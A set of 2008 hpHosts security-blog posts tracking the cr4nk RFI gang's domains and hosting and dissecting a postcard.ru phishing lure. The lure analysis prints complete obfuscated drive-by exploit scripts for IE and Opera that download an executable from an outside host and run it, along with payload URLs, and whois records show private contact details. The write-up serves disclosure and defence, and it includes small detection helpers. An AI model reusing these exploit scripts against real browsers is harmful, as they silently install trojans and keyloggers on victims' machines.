Blog for hpHosts, and whatever else I feel like writing about ....

Friday, 3 October 2008

Directi and HostFresh still supporting criminals!


It would seem Directi wasn't really being serious when they said they were clamping down on just what their customers were doing, because our friend cr4nk now has a new domain (as of September 23rd) - cr4nk.us.

WhoIs Information:

Domain Name: CR4NK.US
Domain ID: D17780827-US
Sponsoring Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. DBA PUBLICDOMAINREGISTRY.COM
Registrar URL (registration services): www.publicdomainregistry.com
Domain Status: clientDeleteProhibited
Domain Status: clientTransferProhibited
Domain Status: clientUpdateProhibited
Registrant ID: DI_2419181
Registrant Name: ITWEB Domain Protection
Registrant Organization: ITWEB Domain Protection
Registrant Address1: Edif. Neptuno, Local #7
Registrant Address2: Via Ricardo J Alfaro, Tumba Muerto
Registrant City: Panama Ciudad
Registrant State/Province: Panama
Registrant Postal Code: -
Registrant Country: Panama
Registrant Country Code: PA
Registrant Phone Number: +005.72021515
Registrant Email: itweb@hushmail.com
Registrant Application Purpose: P1
Registrant Nexus Category: C11
Administrative Contact ID: DI_2419181
Administrative Contact Name: ITWEB Domain Protection
Administrative Contact Organization: ITWEB Domain Protection
Administrative Contact Address1: Edif. Neptuno, Local #7
Administrative Contact Address2: Via Ricardo J Alfaro, Tumba Muerto
Administrative Contact City: Panama Ciudad
Administrative Contact State/Province: Panama
Administrative Contact Postal Code: -
Administrative Contact Country: Panama
Administrative Contact Country Code: PA
Administrative Contact Phone Number: +005.72021515
Administrative Contact Email: itweb@hushmail.com
Administrative Application Purpose: P1
Administrative Nexus Category: C11
Billing Contact ID: DI_2419181
Billing Contact Name: ITWEB Domain Protection
Billing Contact Organization: ITWEB Domain Protection
Billing Contact Address1: Edif. Neptuno, Local #7
Billing Contact Address2: Via Ricardo J Alfaro, Tumba Muerto
Billing Contact City: Panama Ciudad
Billing Contact State/Province: Panama
Billing Contact Postal Code: -
Billing Contact Country: Panama
Billing Contact Country Code: PA
Billing Contact Phone Number: +005.72021515
Billing Contact Email: itweb@hushmail.com
Billing Application Purpose: P1
Billing Nexus Category: C11
Technical Contact ID: DI_2419181
Technical Contact Name: ITWEB Domain Protection
Technical Contact Organization: ITWEB Domain Protection
Technical Contact Address1: Edif. Neptuno, Local #7
Technical Contact Address2: Via Ricardo J Alfaro, Tumba Muerto
Technical Contact City: Panama Ciudad
Technical Contact State/Province: Panama
Technical Contact Postal Code: -
Technical Contact Country: Panama
Technical Contact Country Code: PA
Technical Contact Phone Number: +005.72021515
Technical Contact Email: itweb@hushmail.com
Technical Application Purpose: P1
Technical Nexus Category: C11
Name Server: NS1.IPNAMES.NET
Name Server: NS2.IPNAMES.NET
Created by Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. DBA PUBLICDOMAINREGISTRY.COM
Last Updated by Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. DBA PUBLICDOMAINREGISTRY.COM
Domain Registration Date: Tue Sep 23 01:37:49 GMT 2008
Domain Expiration Date: Tue Sep 22 23:59:59 GMT 2009
Domain Last Updated Date: Tue Sep 23 01:54:02 GMT 2008

>>>> Whois database was last updated on: Fri Oct 03 20:57:20 GMT 2008 <<<<


Even worse here is Directi using ITWeb Domain Protection - a "company" known ONLY for its association with scammy/malicious domains. I've not come across a single legit domain that's associated with them, and as noted above, they don't seem to have their own website, opting instead to provide a hushmail.com contact address. Further to this, ITWeb Domain Protection list their location as Panama (more here), a country that's become a favourite amongst organized criminals online (e.g. Est Domains and the RBN), but interestingly, earlier this year, according to an arbitration, they listed themselves as being in India.

See Google for a ton of people complaining about ITWeb Domain Protection;

http://www.google.co.uk/search?hl=en&q=%22ITWEB+Domain+Protection%22&start=10&sa=N

And who is providing the hosting for this domain? HostFresh of course - same as last time.

inetnum: 116.50.8.0 - 116.50.15.255
netname: HOSTFRESH
descr: HostFresh
descr: Internet Service Provider
country: HK
admin-c: PL466-AP
tech-c: PL466-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-HK-HOSTFRESH
mnt-routes: MAINT-HK-HOSTFRESH
remarks: Please send Spam & Abuse report to
remarks: abuse@hostfresh.com
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20070307
source: APNIC

person: Piu Lo
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
country: HK
changed: ipadmin@hostfresh.com 20071025
mnt-by: MAINT-HK-HOSTFRESH
source: APNIC


I have sent Directi an e-mail asking why they've allowed cr4nk to register a new domain with them, given their known (and still ongoing) history of trying to exploit web servers via RFI (Remote File Injection) and DCI (Direct Code Injection), and will let you know if/when I receive a response (I'm not hopeful).

Other domains on this IP block include;





References:

hpHosts - cr4nk.us
http://hosts-file.net/?s=cr4nk.us

cr4nk.ws again - another Directi, LogicBoxes, LiquidWeb exploit gang
http://hphosts.blogspot.com/2008/09/cr4nkws-again-another-directi.html

cr4nk.ws has moved to Hostfresh
http://hphosts.blogspot.com/2008/09/cr4nkws-has-moved-to-hostfresh.html

cr4nk.ws has gone!
http://hphosts.blogspot.com/2008/09/cr4nkws-has-gone.html

cr4nk responds - OH NOEZ!
http://hphosts.blogspot.com/2008/09/cr4nk-responds-oh-noez.html

Skiddie responds ..... again - cr4nk says thanks?
http://hphosts.blogspot.com/2008/10/skiddie-responds-again-cr4nk-says.html

Thursday, 2 October 2008

Postcard.ru malware ... and esthost.eu make an appearance

Is it just me, or does this seem familiar? Of course it does; postcard.ru malware has been going around for yonks!

I received another e-mail today, and I must admit it's been a while since I've received one of these, but nevertheless, the e-mail claimed to come from postcard.ru;

Вам пришла виртуальная открытка.
Для ее получения зайдите на сайт <http://www.postcard.ru/card.php?1970893242>
www.postcard.ru/card.php?2718276704 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
и нажмите на ссылку 'получить открытку'

Служба рассылки открыток POSTCARD.RU
------------------------------------------------

You recieved an postcard.
To get it follow to web-site <http://www.postcard.ru/card.php?3765275987>
www.postcard.ru/card.php?3373149370 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
switch to english and click on 'get my postcard'

Postcard service POSTCARD.RU
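The giveaway in the lure above is that the text renderer has flattened each HTML anchor into "shown text <real target>", and the visible postcard.ru address never matches the savichev.com href behind it. As an added example, not part of the original post, this Python snippet flags that mismatch in a constructed copy of the mail; the regex, the helper names and the MY_DOMAIN placeholder are my own assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the postcard.ru lure quoted above; the
# recipient address is the page's MY_DOMAIN placeholder, not a real mailbox.
SAMPLE_MAIL = """Вам пришла виртуальная открытка.
Для ее получения зайдите на сайт <http://www.postcard.ru/card.php?1970893242>
www.postcard.ru/card.php?2718276704 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
и нажмите на ссылку 'получить открытку'

You recieved an postcard.
To get it follow to web-site <http://www.postcard.ru/card.php?3765275987>
www.postcard.ru/card.php?3373149370 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
switch to english and click on 'get my postcard'
"""

# "shown-text <real-target>" is how plain-text rendering flattens an anchor
# whose visible text differs from its href.  Only shown text that itself looks
# like a URL or hostname is considered, so an ordinary word before a bare
# <url> (as in "web-site <http://...>") is not flagged.
LINK_RE = re.compile(
    r"((?:https?://)?[\w.-]+\.[a-z]{2,}(?:/[^\s<]*)?)[ \t]*<(https?://[^\s>]+)>",
    re.IGNORECASE,
)

def _host(url: str) -> str:
    """Hostname, lower-cased, with a leading 'www.' removed."""
    if "://" not in url:
        url = "http://" + url
    host = (urlparse(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host

def find_link_mismatches(text: str) -> list[tuple[str, str]]:
    """Return (shown_host, real_host) pairs whose hosts differ."""
    found = []
    for shown, real in LINK_RE.findall(text):
        shown_host, real_host = _host(shown), _host(real)
        if shown_host and real_host and shown_host != real_host:
            found.append((shown_host, real_host))
    return found

if __name__ == "__main__":
    for shown, real in find_link_mismatches(SAMPLE_MAIL):
        print(f"link text says {shown} but points at {real}")
```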


savichev.com (89.108.94.111, PTR: server5.pwstudio.ru) is the first site we see. This loads an iFrame to twain32.cn;

<iframe name="ABNHosting" src="http://www.twain32.cn/img/out.php?s_id=1&s=card" frameborder="0" border="0" height="1" width="100"></iframe>


Ref:
http://vurl.mysteryfcm.co.uk/?url=132594

If you are using IE7 then twain32.cn returns the following;

 <script>
 function CreateO(os, nz)
 {
   var e0 = null;
   try
   {
     eval('e0 = os.CreateObject(nz)')
   }
   catch(e)
   {
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.CreateObject(nz, "")')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.CreateObject(nz, "", "")')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.GetObject("", nz)')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.GetObject(nz, "")')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.GetObject(nz)')
     }
     catch(e)
     {
     }
   }
   return(e0);
 }
 function Download(a)
 {
   var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
   lm.open('G'+'E'+'T','http://www.yvon-publicidad.com/images/images.php?w=0&e=2',false);
   lm.send();
   var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');
   o.type = 1;
   o.Mode = 3;
   o.open();
   o.Write(lm.responseBody);
   var tut = ".//..//win"+".exe";
   o.savetoFile(tut,2);
   o.close();
   var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
   s.Shellexecute(tut);
 }
 var x = 0;
 var t = new Array(
'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);
 while (t[x])
 {
   var a = null;
   if (t[x].substring(0,1) == '{')
   {
     a = document.createElement('object');
     a.setAttribute('cl'+'a'+'ss'+'id', 'cl'+'s'+'id:' + t[x].substring(1, t[x].length + 1));
   }
   else
   {
     try
     {
       a = new ActiveXObject(t[x]);
     }
     catch(e)
     {
     }
   }
   if (a)
   {
     try
     {
       var b = CreateO(a, 'Sh'+'el'+'l'+'.'+'A'+'p'+'pl'+'ica'+'ti'+'on');
       if (b)
       {
         if (Download(a)) break;
       }
     }
     catch(e)
     {
     }
   }
   x++;
 }
 setTimeout("window.location = 'jav.php'", 2500);
 </script>
 </body>
 </html>


If you are using Opera, you get the following;

<script language=javascript>  
blank_iframe = document.createElement('if'+'ra'+'me');  
blank_iframe.src = 'a'+'bo'+'ut:b'+'lank';  
blank_iframe.setAttribute('st'+'yle', 'disp'+'lay:n'+'one');  
blank_iframe.setAttribute('i'+'d', 'bla'+'nk_i'+'fram'+'e_w'+'indow');  
document.appendChild(blank_iframe);  
blank_iframe_window.eval  
   ("config_iframe = document.createElement('if'+'ra'+'me');\  
   config_iframe.setAttribute('i'+'d', 'con'+'fig_if'+'rame_w'+'indow');\  
   config_iframe.src = 'op'+'era:c'+'on'+'fig';\  
    document.appendChild(config_iframe);\  
    app_iframe = document.createElement('sc'+'ri'+'pt');\  
    cache_iframe = document.createElement('if'+'ra'+'me');\  
    app_iframe.src = 'http://www.yvon-publicidad.com/images/images.php?w=0&e=2';\  
    app_iframe.onload = function ()\  
    {\  
        cache_iframe.src = 'op'+'er'+'a:c'+'ache';\  
        cache_iframe.onload = function ()\  
        {\  
            cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\  
            var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe
            .src.toUpperCase(), '');\ 
            filename = cache.match(re);\  
            config_iframe_window.eval\  
            (\"\  
            opera.setPreference('Ne'+'tw'+'or'+'k','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\  
            app_link = document.createElement('a');\  
            app_link.setAttribute('h'+'r'+'ef', 't'+'n3'+'270://n'+'oth'+'ing');\  
            app_link.click();\  
            setTimeout(function () {opera.setPreference('Ne'+'tw'+'ork','TN'+'327'+'0 A'+'pp','te'+'ln'+'et.'+'exe')},1000);\  
            \");\  
        };\  
        document.appendChild(cache_iframe);\  
    };\  
    document.appendChild(app_iframe);");  
</script>  
</body>  
</html>


Ref:
http://vurl.mysteryfcm.co.uk/?url=132605
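Both the IE payload and the Opera payload above hide their COM ProgIDs, CLSIDs, protocol handlers and preference names by splitting every string into 'a'+'b'+'c' pieces, which is enough to defeat a naive signature. As an added example, not code from the post, this Python helper collapses those runs and lists the literals that only exist after merging, run over an excerpt of the lines quoted above; the function names are my own.

```python
import re

# Excerpt of the obfuscated lines quoted above (IE and Opera payloads),
# copied as they appear on the page.
SAMPLE_JS = r"""
var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
lm.open('G'+'E'+'T','http://www.yvon-publicidad.com/images/images.php?w=0&e=2',false);
var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');
var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
var t = new Array(
'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);
a.setAttribute('cl'+'a'+'ss'+'id', 'cl'+'s'+'id:' + t[x].substring(1, t[x].length + 1));
config_iframe.src = 'op'+'era:c'+'on'+'fig';
app_link.setAttribute('h'+'r'+'ef', 't'+'n3'+'270://n'+'oth'+'ing');
"""

# One single-quoted literal with no escapes or newlines inside it.
_LIT = r"'[^'\\\n]*'"
# Two or more such literals joined only by '+' (and optional whitespace).
_RUN = re.compile(rf"(?:{_LIT}\s*\+\s*)+{_LIT}")

def join_split_strings(js: str) -> str:
    """Collapse 'a'+'b'+'c' into 'abc' everywhere; other code is untouched."""
    def merge(m: re.Match) -> str:
        parts = re.findall(r"'([^'\\\n]*)'", m.group(0))
        return "'" + "".join(parts) + "'"
    return _RUN.sub(merge, js)

def revealed_strings(js: str, min_len: int = 6) -> list[str]:
    """Literals that only exist after merging, i.e. what the author hid."""
    before = set(re.findall(r"'([^'\\\n]*)'", js))
    after = re.findall(r"'([^'\\\n]*)'", join_split_strings(js))
    return sorted({s for s in after if s not in before and len(s) >= min_len})

if __name__ == "__main__":
    print(join_split_strings(SAMPLE_JS))
    for s in revealed_strings(SAMPLE_JS):
        print("hidden string:", s)
```

The merged output is what a content signature should be written against; the split form changes trivially between samples while the ProgIDs and CLSIDs do not.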

twain32.cn resolves to the IP 195.5.116.239, which has a PTR of src.esthost.eu (IP: 195.5.116.239). Alas, whois.eu doesn't seem to want to allow a remote WhoIs lookup, so we've gone to eurid.eu instead. No problem. Doing a WhoIs lookup on esthost.eu there, we see;

Domain
Name esthost
Status REGISTERED
Registered April 7, 2006
Last update October 18, 2007, 12:48 pm

Registrant
Name Viktor Norin
Organisation Starline Web Services
Language English
Address
    PAE 21
    11415 Tallinn
    EE
    Estonia
Phone +372.6370911
Fax +372.6370911
Email hostmaster@esthost.eu

Registrar technical contacts
Name Domain Manager
Organisation PublicDomainRegistry.com
Language English
Address
    14525 SW Millikan #48732
    97005-2343 Beaverton
    Oregon
    United States
Phone +1.2013775952
Fax +1.320.2105146
Email domain.manager@publicdomainregistry.com

Registrar
Organisation PublicDomainRegistry.com
Website www.publicdomainregistry.com

Nameservers
ns2.esthost.eu (195.5.117.233)
ns1.esthost.eu (195.5.116.233)


Net-block information:

inetnum: 195.5.116.0 - 195.5.117.255
netname: EE-COMPIC
descr: Compic Ltd.
country: EE
org: ORG-CL48-RIPE
admin-c: RI215-RIPE
tech-c: RI215-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: AS3327-MNT
mnt-routes: AS3327-MNT
mnt-domains: AS3327-MNT
source: RIPE # Filtered

organisation: ORG-CL48-RIPE
org-name: Compic Ltd.
org-type: OTHER
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
phone: +372 6321028
e-mail: roman@compic.ee
admin-c: RI215-RIPE
mnt-ref: AS3327-MNT
mnt-by: AS3327-MNT
source: RIPE # Filtered

person: Roman Ivanov
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
mnt-by: AS39823-MNT
phone: +3726321028
e-mail: roman@compic.ee
nic-hdl: RI215-RIPE
source: RIPE # Filtered

% Information related to '195.5.116.0/23AS39823'

route: 195.5.116.0/23
descr: Compic Ltd.
origin: AS39823
mnt-by: AS3327-MNT
source: RIPE # Filtered


Getting back to the infection, however: the payload comes courtesy of yvon-publicidad.com, as you can see in the source code above;

http://www.yvon-publicidad.com/images/images.php?w=0&e=2

This drops a 1.95K file called mstelnet.exe (FSG packed), which Avira flagged as;



This, according to ThreatExpert, downloads the following;

http://www.yvon-publicidad.com/images/images.php?w=1 (7.12K - HIDDENEXT/Crypted)
http://www.yvon-publicidad.com/images/images.php?w=2 (45K - TR/Crypt.Morphine.Gen)
http://www.yvon-publicidad.com/images/images.php?w=3 (45K - TR/Crypt.Morphine.Gen)
http://www.yvon-publicidad.com/images/images.php?w=4 (27K - TR/Crypt.Morphine.Gen)

Ref:
http://www.threatexpert.com/report.aspx?md5=cbec5204eddd57aadc4b09d6d1a0a003

The report makes for very interesting reading, as it shows an injection into the IE process (it injects mswapi.dll), trojans and keyloggers - oh the fun!

WhoIs for the domain shows;

Registrant:
Guillain Jean-Daniel
21, rue des vertus
Marseille, 13005
France

Registrar: DOTREGISTRAR
Domain Name: YVON-PUBLICIDAD.COM
Created on: 20-MAY-05
Expires on: 20-MAY-09
Last Updated on: 06-APR-08


A little searching turned up a couple of other possibly related (previous versions?) reports;

http://www.threatexpert.com/report.aspx?uid=d0ce4715-e6e2-4a3e-b4e0-69a2fb7698cb

http://research.sunbelt-software.com/ViewMalware.aspx?id=2787949

vURL Online Updated .......

Just a note folks: I've re-written part of vURL Online so that you now have a nice clean link to use when you want to refer back to a result. For example;

http://vurl.mysteryfcm.co.uk/?url=132590

Previously, this would have been an extremely long URL;

http://vurl.mysteryfcm.co.uk/?url=http://www.twain32.cn/img/out.php?s_id=1&selUAStr=0&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=3&ref=http://savichev.com/card.php?fr=HarrisScott

Wednesday, 1 October 2008

Skiddie responds ..... again - cr4nk says thanks?

I thought our skiddie was finished following his last e-mail but alas, he wants me to know he's still there. This time, he thanked me for info (not sure what he's thanking me for but okay), and says that my taking his site offline was "no problem for us".

ah hy steven. well u busted our website but u have to think abit again. cuz on the space was no illegal stuff. we are using the bots on other servers we are not stupid. we take a new domain and its over. no problem for us but thanks for the info


Pity he didn't tell me what the new domain was ......

Skiddiealysis - Analyzing skiddie scanners

I came across this early this morning but was far too shattered to post about it ..... so several hours and some sleep later, here it is. This comes courtesy of Insecurity.nl;

Due to the international nature of the blogging entry, it will be in English, for some non-Dutch speaking internet users might be interested in its contents. Some time ago, SavageTiger blogged about the RFI bot attacks against our servers, and the internet in general. I decided to take a look, interested in the concept of automated RFI scanners and PHP-based bots. Although the groups behind it turned out to be rather disappointing, and I encountered a lot of horribly written code, it was a rather interesting ride as well. Let us first look at the bot SavageTiger discovered:


http://www.insecurity.nl/?strInsecurity_Component=article&intArticle_ID=111

Interestingly, our favourite skiddie, cr4nk, hasn't replied since his second e-mail this morning. Ran out of words in his vocabulary perhaps?